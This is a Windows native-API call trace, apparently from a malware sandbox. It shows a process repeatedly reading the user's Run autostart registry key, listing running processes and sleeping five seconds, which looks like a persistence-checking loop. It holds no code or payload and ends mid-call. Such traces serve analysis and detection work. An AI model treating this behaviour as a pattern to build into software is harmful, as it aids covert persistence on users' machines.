[0175.354] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0175.356] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0175.356] NtClose (Handle=0x274) returned 0x0 [0175.356] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0175.356] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0175.358] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0175.358] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0175.359] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0175.363] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0175.363] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0175.369] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0175.370] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0175.370] NtClose (Handle=0x274) returned 0x0 [0175.370] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0175.371] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0175.372] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0175.373] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0175.373] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0175.378] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0175.378] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0175.381] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0175.382] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0175.382] NtClose (Handle=0x274) returned 0x0 [0175.382] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0175.383] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0175.385] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0175.385] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0175.385] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0175.389] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0175.390] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0175.395] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0175.396] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0175.396] NtClose (Handle=0x274) returned 0x0 [0175.396] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0175.396] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0175.398] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0175.398] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0175.399] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0175.403] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0175.405] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0175.412] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0175.414] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0175.414] NtClose (Handle=0x274) returned 0x0 [0175.414] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0175.444] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0175.446] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0175.446] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0175.446] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0175.452] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0175.452] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0175.458] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0175.459] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0175.460] NtClose (Handle=0x274) returned 0x0 [0175.460] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0175.460] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0175.462] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0175.462] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0175.462] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0175.467] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0175.467] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0175.474] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0175.475] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0175.475] NtClose (Handle=0x274) returned 0x0 [0175.475] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0175.475] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0175.477] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0175.478] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0175.478] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0175.482] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0175.482] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0175.492] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0175.493] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0175.494] NtClose (Handle=0x274) returned 0x0 [0175.494] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0175.494] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0175.497] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0175.498] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0175.498] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0175.502] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0175.503] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0175.506] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0175.507] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0175.507] NtClose (Handle=0x274) returned 0x0 [0175.507] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0175.507] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0175.511] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0175.511] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0175.512] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0175.516] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0175.516] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0175.527] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0175.528] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0175.528] NtClose (Handle=0x274) returned 0x0 [0175.528] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0175.528] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0175.530] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0175.531] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0175.531] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0175.535] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0175.535] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0175.541] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0175.542] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0175.542] NtClose (Handle=0x274) returned 0x0 [0175.542] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0175.542] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0175.544] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0175.545] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0175.545] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0175.549] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0175.550] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0175.558] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0175.560] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0175.560] NtClose (Handle=0x274) returned 0x0 [0175.560] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0175.560] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0175.562] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0175.562] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0175.563] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0175.566] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0175.567] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0175.573] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0175.574] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0175.574] NtClose (Handle=0x274) returned 0x0 [0175.574] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0175.574] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0175.577] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0175.577] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0175.577] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0175.581] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0175.581] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0175.583] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0175.584] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0175.584] NtClose (Handle=0x274) returned 0x0 [0175.585] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, 